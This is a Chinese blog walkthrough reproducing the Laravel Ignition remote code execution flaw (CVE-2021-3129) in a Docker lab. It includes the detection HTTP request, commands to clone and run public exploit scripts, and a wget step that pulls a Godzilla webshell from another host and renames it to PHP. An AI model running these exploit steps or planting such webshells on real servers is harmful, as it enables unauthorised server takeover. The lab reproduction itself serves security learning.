Laravel RCE(CVE-2021-3129)复现

这篇具有很好参考价值的文章主要介绍了Laravel RCE(CVE-2021-3129)复现。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

目录

参考

环境搭建

漏洞分析

漏洞检测

漏洞利用

第一种方法 这个主要是关于工具脚本

第二种方法


参考

CVE-2021-3129 分析-云社区-华为云

环境搭建

我们这里通过docker来搞环境

https://github.com/SNCKER/CVE-2021-3129

//通过git复制过来
git clone https://github.com/SNCKER/CVE-2021-3129

//来到这个文件夹中
cd CVE*

//使用docker启动,没有docker-compose kali可以通过apt安装
docker-compose up -d
docker ps //查看开启的环境

//查看自己ip,然后访问
http://ip:8888

点击这个key,然后点击那里有横线的

 laravel exp,cve复现,linux,经验分享,安全,学习,docker

laravel exp,cve复现,linux,经验分享,安全,学习,docker

漏洞分析

漏洞检测

 这里使用burp方便一点,下面是检测有没有漏洞的poc

POST /_ignition/execute-solution HTTP/1.1
Host: localhost:8000
Content-Length: 169
Accept: application/json
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Origin: http://localhost:8000
Referer: http://localhost:8000/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

{
    "solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution",
    "parameters": {
        "variableName": "1",
        "viewFile": "1"
    }
}

我们接下来打开burp,在这里,我们将上面的复制进去。

laravel exp,cve复现,linux,经验分享,安全,学习,docker

点击发送以后我们配置一下,这里使用自己环境机子的ip

laravel exp,cve复现,linux,经验分享,安全,学习,docker

最后响应包中是500,便是存在漏洞。

laravel exp,cve复现,linux,经验分享,安全,学习,docker

漏洞利用

第一种方法

注:两个exp我都没有成功,但是有人成功,可能是我机子有问题,所以这里大家可以自己试试

第一个exp

这里我们git过来的文件中就有exp python文件

然后我们最后一行修改内容为自己环境的ip和想执行的命令

laravel exp,cve复现,linux,经验分享,安全,学习,docker

 但是我们这里需要phpggc的环境,这里有两种方法:

1. git复制过来工具,git clone https://github.com/ambionics/phpggc.git

    这里注意exp文件要和工具在一个目录中,这种不太推荐。

2. 我们使用kali直接下载这个工具,lsudo apt-get install phpggc

但是吧,这里也不坑大家,这里我属实是没有成功,里面的三个rce跑完了也没有跑出来,但是也建议大家自己试试

所以我去github有找到了另一个exp,去尝试尝试。

第二个exp

#另一个exp
//还是使用git复制过来
git clone https://github.com/SecPros-Team/laravel-CVE-2021-3129-EXP

//然后来到那个目录中
cd laraver-CVE*

//这里要看自己的ip
python3 laravel-CVE-2021-3129-EXP.py http://192.168.1.16:8888

 laravel exp,cve复现,linux,经验分享,安全,学习,docker

laravel exp,cve复现,linux,经验分享,安全,学习,docker

作者提示我们是使用哥斯拉的,这里都别用错了。

 laravel exp,cve复现,linux,经验分享,安全,学习,docker

但是这里又出现一个问题,就是我们连不上,这里自己分析一下问题。

1.写进去的马有问题

2.写进去了但是文件是空

3.自己操作有问题

4.哥斯拉有问题

首先3可以排除了,这里操作基本没什么问题。

然后就是4,这里我们生成一个php的马,然后放到本地机中,可以连接,没有问题

1和2都需要我们去容器目录中看看

进入容器的方法可以看看这个docker进入容器中的方法

根目录在/src/public中

我们发现了这个木马,经过查看没有发现什么不对的,这里排除了2,接下来就是验证马的问题了

 laravel exp,cve复现,linux,经验分享,安全,学习,docker

我们使用哥斯拉生成一个shell.php的马,然后使用开启apache之类,放到根目录中,把后缀改成txt,然后我们使用wget下载过来。

//这里使用我们开启网站的ip,看看自己的
wget http://192.168.1.5/shell.txt

//然后把后缀改回来
mv shell.txt shell.php

 laravel exp,cve复现,linux,经验分享,安全,学习,docker

最终这个是连接上去了,这样就是马出了问题,我们查看一下两个的区别。

 laravel exp,cve复现,linux,经验分享,安全,学习,docker

我们发现这个有换行,那个没换行,感觉就是这个问题了,但是有的人确实可以直接连接,会不会是我哥斯拉版本有点高。

 laravel exp,cve复现,linux,经验分享,安全,学习,docker


第二种方法

 因为本人还是比较菜,不怎么分析的明白,这里建议还看看华为云开发者联盟这里的文章来源地址https://www.toymoban.com/news/detail-562373.html

到了这里,关于Laravel RCE(CVE-2021-3129)复现的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • CVE-2021–26855与CVE-2021–27065漏洞分析及复现

    文章首发先知社区:https://xz.aliyun.com/t/10098 微软在上半年三月披露了关于Exchange邮件服务器 CVE-2021–26855 (SSRF)与 CVE-2021–27065 (任意文件写入)的漏洞,这两个漏洞配合可以造成未授权的webshell写入,是非常严重的高危漏洞。漏洞刚出来那会儿并未注意,正好前两天4哥在群里发了个关

    2024年02月07日
    浏览(39)
  • Windows MSDT RCE(CVE-2022-30190)复现

    可利用恶意 Office 文件中的远程模板功能从远程网络服务器获取恶意 HTML 文件,通过微软支持诊断工具(Microsoft Support Diagnostic Tool,MSDT)执行恶意 PowerShell 代码。该漏洞在宏被禁用的情况下,仍然可以调用 MSDT 执行恶意代码。并且当恶意文件另存为 RTF 格式时,还可以通过

    2024年02月07日
    浏览(36)
  • Fortinet FortiNAC RCE漏洞复现(CVE-2022-39952)

          FortiNAC(Network Access Control) 是Fortinet的一种零信任网络访问控制解决方案,可增强用户对企业网络上的物联网 (IoT) 设备的监控。NAC 是零信任网络访问安全模型的重要组成部分,在该模型中,IT 团队可以轻松了解正在访问网络的人员和设备,以及如何保护网络内外的公司资

    2024年02月06日
    浏览(42)
  • CVE-2021-22204 GitLab RCE之exiftool代码执行漏洞深入分析(二)

    文章写于2022-01-19,首发在天融信阿尔法实验室 1 前言 2 前置知识 2.1 JPEG文件格式 2.2 Perl模式匹配 3 exiftool源码调试到漏洞分析 3.1 环境搭建 3.2 漏洞简介 3.3 exiftool是如何解析嵌入的0xc51b标签 3.4 exiftool是如何调用parseAnt函数 3.5 parseAnt函数分析 3.6 parseAnt漏洞分析 4 漏洞利用 4.1

    2024年02月14日
    浏览(37)
  • CVE -2022-26134漏洞复现(Confluence OGNL 注入rce漏洞)

    0x01 Atlassian Confluence Atlassian Confluence是一个专业的企业知识管理与协同软件,主要用于公司内员工创建知识库并建立知识管理流程,也可以用于构建企业wiki。其使用简单,但它强大的编辑和站点管理特征能够帮助团队成员之间共享信息、文档协作、集体讨论,信息推送。因此

    2024年02月16日
    浏览(46)
  • Django系列所有漏洞复现vulhubCVE-2018-14574,CVE-2022-34265,CVE-2021-35042

    Django默认配置下,如果匹配上的URL路由中最后一位是/,而用户访问的时候没加/,Django默认会跳转到带/的请求中。(由配置项中的django.middleware.common.CommonMiddleware、APPEND_SLASH来决定)。 在path开头为//example.com的情况下,Django没做处理,导致浏览器认为目的地址是绝对路径,最

    2024年02月07日
    浏览(40)
  • Sudo堆溢出漏洞(CVE-2021-3156)复现

    2021 年 1 月 26 日,Qualys Research Labs在 sudo 发现了一个缺陷。sudo 解析命令行参数的方式时,错误的判断了截断符,从而导致攻击者可以恶意构造载荷,使得sudo发生堆溢出,该漏洞在配合环境变量等分配堆以及释放堆的原语下,可以致使本地提权。 环境版本 • ubuntu 20.04 • su

    2024年02月11日
    浏览(34)
  • CVE-2021-22205 GitLab 远程命令执行漏洞复现

    目录 一、漏洞信息 二、环境搭建 三、复现过程 1.测试漏洞 2.漏洞利用,反弹shell 四、修复建议 一、漏洞信息 漏洞名称 GITLAB 远程命令执行漏洞 漏洞编号 CVE-2021-22205 危害等级 高危 CVSS评分 6.5 漏洞厂商 Ruby 受影响版本 11.9 = Gitlab CE/EE 13.8.8;13.9 = Gitlab CE/EE 13.9.6;13.10 = Gitlab

    2024年02月05日
    浏览(41)
  • HIKVISION海康威视代码执行漏洞复现(CVE-2021-36260)

    2023年将会持续于B站、CSDN等各大平台更新,可加入粉丝群与博主交流:838681355,为了老板大G共同努力。 GET访问/x.asp

    2024年02月12日
    浏览(40)
  • WebLogic反序列化漏洞复现+利用工具(CVE-2021-2394)

    Oracle官方发布了2021年7月份安全更新通告,通告中披露了WebLogic组件存在高危漏洞,攻击者可以在未授权的情况下通过IIOP、T3协议对存在漏洞的WebLogic Server组件进行攻击。成功利用该漏洞的攻击者可以接管WebLogic Server。 这是一个二次反序列化漏洞,是CVE-2020-14756和CVE-2020-14825的

    2024年02月06日
    浏览(94)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包